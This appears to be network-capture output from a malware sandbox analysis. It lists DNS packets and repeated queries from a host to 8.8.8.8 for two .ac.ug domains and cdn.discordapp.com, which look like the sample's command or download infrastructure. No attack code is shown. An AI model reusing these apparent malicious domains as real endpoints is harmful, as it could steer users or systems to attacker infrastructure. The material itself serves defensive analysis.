Jun 4, 2021 09:40:33.035231113 CEST	60542	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:33.085849047 CEST	53	60542	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:34.236119986 CEST	60689	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:34.285319090 CEST	53	60689	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:35.292241096 CEST	64206	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:35.394838095 CEST	53	64206	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:36.549367905 CEST	50904	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:36.664606094 CEST	53	50904	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:37.678133011 CEST	57525	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:38.007536888 CEST	53814	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:38.057444096 CEST	53	53814	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:38.686717033 CEST	57525	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:38.735856056 CEST	53	57525	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:38.959199905 CEST	53	57525	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:39.890947104 CEST	53418	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:39.940066099 CEST	53	53418	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:40.951872110 CEST	62833	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:41.000473976 CEST	53	62833	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:42.213363886 CEST	59260	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:42.285602093 CEST	53	59260	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:42.890507936 CEST	49944	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:42.941764116 CEST	53	49944	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:43.004446030 CEST	63300	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:43.056083918 CEST	53	63300	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:43.303922892 CEST	61449	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:43.352905035 CEST	53	61449	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:43.625176907 CEST	51275	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:43.673769951 CEST	53	51275	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:44.096595049 CEST	63492	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:44.163150072 CEST	53	63492	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:44.493014097 CEST	58945	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:44.544090033 CEST	53	58945	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:44.619203091 CEST	60779	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:44.667825937 CEST	53	60779	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:45.050326109 CEST	64014	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:45.099097013 CEST	53	64014	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:45.677834988 CEST	57091	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:45.728987932 CEST	53	57091	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:45.813648939 CEST	55904	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:45.855035067 CEST	53	55904	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:47.621577024 CEST	52109	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:47.670643091 CEST	53	52109	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:47.980453014 CEST	54450	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:48.028963089 CEST	53	54450	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:48.652345896 CEST	49374	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:48.701225996 CEST	53	49374	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:48.971319914 CEST	50436	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:49.019717932 CEST	53	50436	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:49.869676113 CEST	62605	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:49.920325994 CEST	53	62605	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:50.174776077 CEST	54256	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:50.223773003 CEST	53	54256	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:51.041712046 CEST	52189	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:51.092365026 CEST	53	52189	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:51.236432076 CEST	56131	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:51.287056923 CEST	53	56131	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:51.587747097 CEST	62992	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:51.637762070 CEST	53	62992	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:52.444996119 CEST	54432	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:52.494193077 CEST	53	54432	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:53.502222061 CEST	57227	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:53.551012993 CEST	53	57227	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:54.703207016 CEST	58383	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:54.753180981 CEST	53	58383	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:55.762176037 CEST	63136	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:55.813472033 CEST	53	63136	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:57.114552975 CEST	50911	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:57.156025887 CEST	53	50911	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:58.169900894 CEST	63409	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:58.218678951 CEST	53	63409	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:59.510843992 CEST	59185	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:59.560050964 CEST	53	59185	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:00.566936016 CEST	64236	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:00.669122934 CEST	53	64236	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:01.106141090 CEST	56157	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:01.155877113 CEST	53	56157	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:01.952771902 CEST	55601	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:02.001405954 CEST	53	55601	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:03.012248039 CEST	52984	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:03.061315060 CEST	53	52984	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:04.241699934 CEST	51141	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:04.290596962 CEST	53	51141	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:05.381131887 CEST	53610	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:05.429944038 CEST	53	53610	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:06.781021118 CEST	61247	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:06.830806971 CEST	53	61247	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:07.852442980 CEST	65165	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:07.903352022 CEST	53	65165	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:09.087080956 CEST	52076	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:09.129702091 CEST	53	52076	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:10.148986101 CEST	54903	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:10.197743893 CEST	53	54903	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:11.368159056 CEST	55045	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:11.409699917 CEST	53	55045	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:12.430563927 CEST	54464	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:12.471990108 CEST	53	54464	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:13.652421951 CEST	50970	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:13.701833963 CEST	53	50970	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:14.711209059 CEST	55261	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:14.761611938 CEST	53	55261	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:15.930104017 CEST	59809	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:15.979192019 CEST	53	59809	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:17.113964081 CEST	51278	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:17.167419910 CEST	53	51278	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:18.341006994 CEST	51932	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:18.453221083 CEST	53	51932	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:19.466461897 CEST	59494	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:19.515099049 CEST	53	59494	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:20.680043936 CEST	55915	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:20.731895924 CEST	53	55915	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:21.743691921 CEST	49779	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:21.794507027 CEST	53	49779	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:22.963929892 CEST	49458	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:23.012999058 CEST	53	49458	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:24.024235964 CEST	57164	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:24.065589905 CEST	53	57164	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:25.228212118 CEST	49840	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:25.277705908 CEST	53	49840	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:26.291290998 CEST	57174	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:26.342190981 CEST	53	57174	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:27.510420084 CEST	58531	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:27.559171915 CEST	53	58531	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:28.571286917 CEST	49608	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:28.619645119 CEST	53	49608	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:29.422276974 CEST	55682	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:29.488337040 CEST	53	55682	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:29.790783882 CEST	62436	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:29.840023994 CEST	53	62436	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:30.827208042 CEST	61230	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:30.856579065 CEST	64730	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:30.875799894 CEST	53	61230	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:30.906867027 CEST	53	64730	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:32.107619047 CEST	60624	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:32.156562090 CEST	53	60624	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:33.167161942 CEST	62600	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:33.215828896 CEST	53	62600	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:34.388963938 CEST	53200	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:34.438519001 CEST	53	53200	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:35.449734926 CEST	61034	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:35.498428106 CEST	53	61034	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:36.683897972 CEST	57687	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:36.733165979 CEST	53	57687	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:37.807146072 CEST	49839	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:37.855993032 CEST	53	49839	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:39.149837017 CEST	57975	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:39.199364901 CEST	53	57975	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:40.482820988 CEST	57610	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:40.531407118 CEST	53	57610	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:41.715715885 CEST	55137	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:41.765302896 CEST	53	55137	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:42.777014971 CEST	59216	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:42.827914000 CEST	53	59216	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:43.996402025 CEST	63495	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:44.045500994 CEST	53	63495	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:45.058801889 CEST	64371	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:45.107799053 CEST	53	64371	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:46.277839899 CEST	54037	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:46.326437950 CEST	53	54037	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:47.362359047 CEST	53481	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:47.411079884 CEST	53	53481	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:48.591324091 CEST	58313	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:48.640156031 CEST	53	58313	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:49.652962923 CEST	58950	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:49.694082975 CEST	53	58950	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:50.874732971 CEST	55011	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:50.925890923 CEST	53	55011	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:51.934591055 CEST	57198	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:51.975991011 CEST	53	57198	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:53.155333042 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:53.196373940 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:54.217448950 CEST	55134	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:54.265856028 CEST	53	55134	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:55.435005903 CEST	53695	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:55.483614922 CEST	53	53695	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:56.497416019 CEST	50975	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:56.548612118 CEST	53	50975	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:57.716850996 CEST	65460	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:57.765820980 CEST	53	65460	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:58.778393984 CEST	63669	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:41:58.829729080 CEST	53	63669	8.8.8.8	192.168.2.4
Jun 4, 2021 09:41:59.995588064 CEST	51653	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:42:00.037149906 CEST	53	51653	8.8.8.8	192.168.2.4
Jun 4, 2021 09:42:01.040570021 CEST	56473	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:42:01.081743956 CEST	53	56473	8.8.8.8	192.168.2.4
Jun 4, 2021 09:42:02.247749090 CEST	61454	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:42:02.300141096 CEST	53	61454	8.8.8.8	192.168.2.4
Jun 4, 2021 09:42:03.308010101 CEST	54323	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:42:03.358968019 CEST	53	54323	8.8.8.8	192.168.2.4
Jun 4, 2021 09:42:04.529351950 CEST	59960	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:42:04.572482109 CEST	53	59960	8.8.8.8	192.168.2.4

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Jun 4, 2021 09:40:38.959440947 CEST	192.168.2.4	8.8.8.8	d005	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jun 4, 2021 09:39:57.147141933 CEST	192.168.2.4	8.8.8.8	0xf48b	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:16.026128054 CEST	192.168.2.4	8.8.8.8	0x559f	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:17.293454885 CEST	192.168.2.4	8.8.8.8	0x89d1	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:18.532757044 CEST	192.168.2.4	8.8.8.8	0xb28f	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:19.829819918 CEST	192.168.2.4	8.8.8.8	0xd1a1	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:20.890875101 CEST	192.168.2.4	8.8.8.8	0x3c4	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:22.111352921 CEST	192.168.2.4	8.8.8.8	0x54e8	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:23.189179897 CEST	192.168.2.4	8.8.8.8	0xd2e	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:24.409887075 CEST	192.168.2.4	8.8.8.8	0x9c86	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:25.471311092 CEST	192.168.2.4	8.8.8.8	0x9f28	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:26.689762115 CEST	192.168.2.4	8.8.8.8	0x2b4a	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:27.849464893 CEST	192.168.2.4	8.8.8.8	0xa26b	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.418231964 CEST	192.168.2.4	8.8.8.8	0xa7d5	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:29.655761957 CEST	192.168.2.4	8.8.8.8	0x4d3d	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:30.482249975 CEST	192.168.2.4	8.8.8.8	0x1860	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:31.892159939 CEST	192.168.2.4	8.8.8.8	0xf6cc	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:33.035231113 CEST	192.168.2.4	8.8.8.8	0xfa74	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:34.236119986 CEST	192.168.2.4	8.8.8.8	0x59f6	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:35.292241096 CEST	192.168.2.4	8.8.8.8	0xa0a0	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:36.549367905 CEST	192.168.2.4	8.8.8.8	0xef6f	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:37.678133011 CEST	192.168.2.4	8.8.8.8	0xbefa	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.007536888 CEST	192.168.2.4	8.8.8.8	0xa9e	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:38.686717033 CEST	192.168.2.4	8.8.8.8	0xbefa	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:39.890947104 CEST	192.168.2.4	8.8.8.8	0xaee	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:40.951872110 CEST	192.168.2.4	8.8.8.8	0xd728	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:42.213363886 CEST	192.168.2.4	8.8.8.8	0xdc3d	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:43.303922892 CEST	192.168.2.4	8.8.8.8	0xb7a7	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:44.619203091 CEST	192.168.2.4	8.8.8.8	0xe6a4	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:45.677834988 CEST	192.168.2.4	8.8.8.8	0x9e3d	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:47.621577024 CEST	192.168.2.4	8.8.8.8	0x7e16	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:48.971319914 CEST	192.168.2.4	8.8.8.8	0x4089	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:50.174776077 CEST	192.168.2.4	8.8.8.8	0x4bbd	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:51.236432076 CEST	192.168.2.4	8.8.8.8	0xc9fc	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:52.444996119 CEST	192.168.2.4	8.8.8.8	0xf5b	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:53.502222061 CEST	192.168.2.4	8.8.8.8	0xf78e	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:54.703207016 CEST	192.168.2.4	8.8.8.8	0xd592	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:55.762176037 CEST	192.168.2.4	8.8.8.8	0xdb85	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:57.114552975 CEST	192.168.2.4	8.8.8.8	0x13c7	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:58.169900894 CEST	192.168.2.4	8.8.8.8	0x4c29	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:40:59.510843992 CEST	192.168.2.4	8.8.8.8	0x936c	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:00.566936016 CEST	192.168.2.4	8.8.8.8	0x45ce	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:01.952771902 CEST	192.168.2.4	8.8.8.8	0x4f6d	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:03.012248039 CEST	192.168.2.4	8.8.8.8	0x135a	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:04.241699934 CEST	192.168.2.4	8.8.8.8	0xc8d0	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:05.381131887 CEST	192.168.2.4	8.8.8.8	0xf803	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:06.781021118 CEST	192.168.2.4	8.8.8.8	0xbf57	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:07.852442980 CEST	192.168.2.4	8.8.8.8	0xbfde	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:09.087080956 CEST	192.168.2.4	8.8.8.8	0x1fe4	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:10.148986101 CEST	192.168.2.4	8.8.8.8	0xfe4a	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:11.368159056 CEST	192.168.2.4	8.8.8.8	0x20b0	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:12.430563927 CEST	192.168.2.4	8.8.8.8	0xa7b0	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:13.652421951 CEST	192.168.2.4	8.8.8.8	0x8da9	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:14.711209059 CEST	192.168.2.4	8.8.8.8	0xcb28	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:15.930104017 CEST	192.168.2.4	8.8.8.8	0x84a	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:17.113964081 CEST	192.168.2.4	8.8.8.8	0x6ccc	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:18.341006994 CEST	192.168.2.4	8.8.8.8	0x5dc6	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:19.466461897 CEST	192.168.2.4	8.8.8.8	0xf0df	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:20.680043936 CEST	192.168.2.4	8.8.8.8	0x37f3	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:21.743691921 CEST	192.168.2.4	8.8.8.8	0x1ba3	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:22.963929892 CEST	192.168.2.4	8.8.8.8	0x5b84	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:24.024235964 CEST	192.168.2.4	8.8.8.8	0xfa28	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:25.228212118 CEST	192.168.2.4	8.8.8.8	0x11de	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:26.291290998 CEST	192.168.2.4	8.8.8.8	0xc8df	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:27.510420084 CEST	192.168.2.4	8.8.8.8	0xc7dc	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:28.571286917 CEST	192.168.2.4	8.8.8.8	0x1bb7	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:29.790783882 CEST	192.168.2.4	8.8.8.8	0x5d38	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:30.856579065 CEST	192.168.2.4	8.8.8.8	0x22d3	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:32.107619047 CEST	192.168.2.4	8.8.8.8	0x32b1	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:33.167161942 CEST	192.168.2.4	8.8.8.8	0x54cd	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:34.388963938 CEST	192.168.2.4	8.8.8.8	0xaf5	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:35.449734926 CEST	192.168.2.4	8.8.8.8	0x4e71	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:36.683897972 CEST	192.168.2.4	8.8.8.8	0x7148	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:37.807146072 CEST	192.168.2.4	8.8.8.8	0x1ad8	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:39.149837017 CEST	192.168.2.4	8.8.8.8	0x9738	Standard query (0)	brudfascaqezd.ac.ug	A (IP address)	IN (0x0001)
Jun 4, 2021 09:41:40.482820988 CEST	192.168.2.4	8.8.8.8	0xeb4e	Standard query (0)	nothinglike.ac.ug	A (IP address)	IN (0x0001)
